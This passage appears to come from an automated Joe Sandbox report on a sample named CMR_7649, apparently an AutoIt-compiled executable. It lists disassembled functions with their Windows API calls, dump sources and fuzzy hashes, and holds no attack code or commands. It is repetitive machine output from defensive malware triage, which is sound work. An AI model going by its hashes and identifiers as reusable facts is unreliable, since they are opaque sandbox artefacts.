                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                • String ID:
                                                • API String ID: 2223660684-0
                                                • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                APIs
                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                • LineTo.GDI32(?,?,?), ref: 00447326
                                                • EndPath.GDI32(?), ref: 00447336
                                                • StrokePath.GDI32(?), ref: 00447344
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                • String ID:
                                                • API String ID: 2783949968-0
                                                • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 00472B63
                                                • GetDC.USER32(00000000), ref: 00472B6C
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 00472BB2
                                                • GetDC.USER32(00000000), ref: 00472BBB
                                                • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                APIs
                                                • __getptd_noexit.LIBCMT ref: 00415150
                                                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                • __freeptd.LIBCMT ref: 0041516B
                                                • ExitThread.KERNEL32 ref: 00415173
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                • String ID:
                                                • API String ID: 1454798553-0
                                                • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _strncmp
                                                • String ID: Q\E
                                                • API String ID: 909875538-2189900498
                                                • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                APIs
                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                • String ID: AutoIt3GUI$Container
                                                • API String ID: 2652923123-3941886329
                                                • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove_strncmp
                                                • String ID: U$\
                                                • API String ID: 2666721431-100911408
                                                • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                APIs
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • __wcsnicmp.LIBCMT ref: 00467288
                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                • String ID: LPT
                                                • API String ID: 3035604524-1350329615
                                                • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \$h
                                                • API String ID: 4104443479-677774858
                                                • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID: &
                                                • API String ID: 2931989736-1010288
                                                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \
                                                • API String ID: 4104443479-2967466578
                                                • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                APIs
                                                • _wcslen.LIBCMT ref: 00466825
                                                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CrackInternet_wcslen
                                                • String ID: |
                                                • API String ID: 596671847-2343686810
                                                • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                APIs
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                APIs
                                                • _strlen.LIBCMT ref: 0040F858
                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                • _sprintf.LIBCMT ref: 0040F9AE
                                                Strings
                                                Memory Dump Source
